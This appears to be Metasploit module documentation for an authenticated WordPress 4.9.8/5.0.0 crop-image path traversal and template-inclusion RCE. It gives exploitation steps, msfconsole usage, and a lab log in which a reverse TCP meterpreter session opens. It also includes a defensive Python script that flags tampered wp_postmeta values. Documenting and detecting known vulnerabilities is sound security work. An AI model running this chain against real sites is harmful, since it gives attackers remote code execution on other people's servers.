On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion. An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
## Exploitation Steps

- Upload an image containing PHP code
- Edit the `_wp_attached_file` entry from the `meta_input` `$_POST` array to specify an arbitrary path
- Perform the Path Traversal by using the `crop-image` WordPress function
- Perform the Local File Inclusion by creating a new WordPress post and setting the `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
When visiting the post created by the attacker it is possible to obtain code execution.
More details can be found on RIPS Technology Blog.
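As an added defensive example (not part of the module or of WordPress), the following Python checks rows from a `wp_postmeta` export for the two meta values the chain above tampers with: `_wp_attached_file` pointing outside the uploads directory, and `_wp_page_template` naming an image instead of a theme PHP file. The sample rows, regexes and function names are constructed assumptions.

```python
"""Heuristic review of wp_postmeta rows for traces of the crop-image
traversal / page-template inclusion chain.

Assumes rows exported from wp_postmeta as (post_id, meta_key, meta_value).
The sample data below is constructed for the example.
"""
import re
from typing import Iterable, List, Optional, Tuple

Row = Tuple[int, str, str]

# Constructed sample of wp_postmeta rows; posts 11 and 22 carry the anomalies.
SAMPLE_POSTMETA: List[Row] = [
    (10, "_wp_attached_file", "2019/03/photo.jpg"),
    (11, "_wp_attached_file", "../../wp-content/themes/twentyseventeen/cropped-photo.jpg"),
    (20, "_wp_page_template", "default"),
    (21, "_wp_page_template", "page-templates/full-width.php"),
    (22, "_wp_page_template", "cropped-photo-1.jpg"),
]

IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif|webp)$", re.IGNORECASE)
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")


def check_attached_file(value: str) -> Optional[str]:
    """_wp_attached_file is normally a relative path below wp-content/uploads."""
    if TRAVERSAL.search(value):
        return "traversal sequence in _wp_attached_file"
    if value.startswith(("/", "\\")) or DRIVE_PATH.match(value):
        return "absolute path in _wp_attached_file"
    return None


def check_page_template(value: str) -> Optional[str]:
    """_wp_page_template should be 'default' or a .php file of the active theme."""
    if value == "default":
        return None
    if TRAVERSAL.search(value):
        return "traversal sequence in _wp_page_template"
    if IMAGE_EXT.search(value):
        return "image file used as page template"
    if not value.lower().endswith(".php"):
        return "non-PHP page template"
    return None


def find_suspicious(rows: Iterable[Row]) -> List[Tuple[int, str, str]]:
    """Return (post_id, meta_key, reason) for every row that fails a check."""
    checks = {"_wp_attached_file": check_attached_file,
              "_wp_page_template": check_page_template}
    hits = []
    for post_id, key, value in rows:
        reason = checks[key](value) if key in checks else None
        if reason:
            hits.append((post_id, key, reason))
    return hits
```

Run it against a real `SELECT post_id, meta_key, meta_value FROM wp_postmeta` export and review every hit by hand, since a legitimate theme can ship non-standard template names.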
## Verification Steps

Confirm that functionality works:

- Start `msfconsole`
- `use exploit/multi/http/wp_crop_rce`
- Set the `RHOST`
- Set `USERNAME` and `PASSWORD`
- Set `LHOST` and `LPORT`
- Run the exploit: `run`
- Confirm you now have a meterpreter session
## Scenarios

### Ubuntu 18.04 running WordPress 4.9.8

```
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```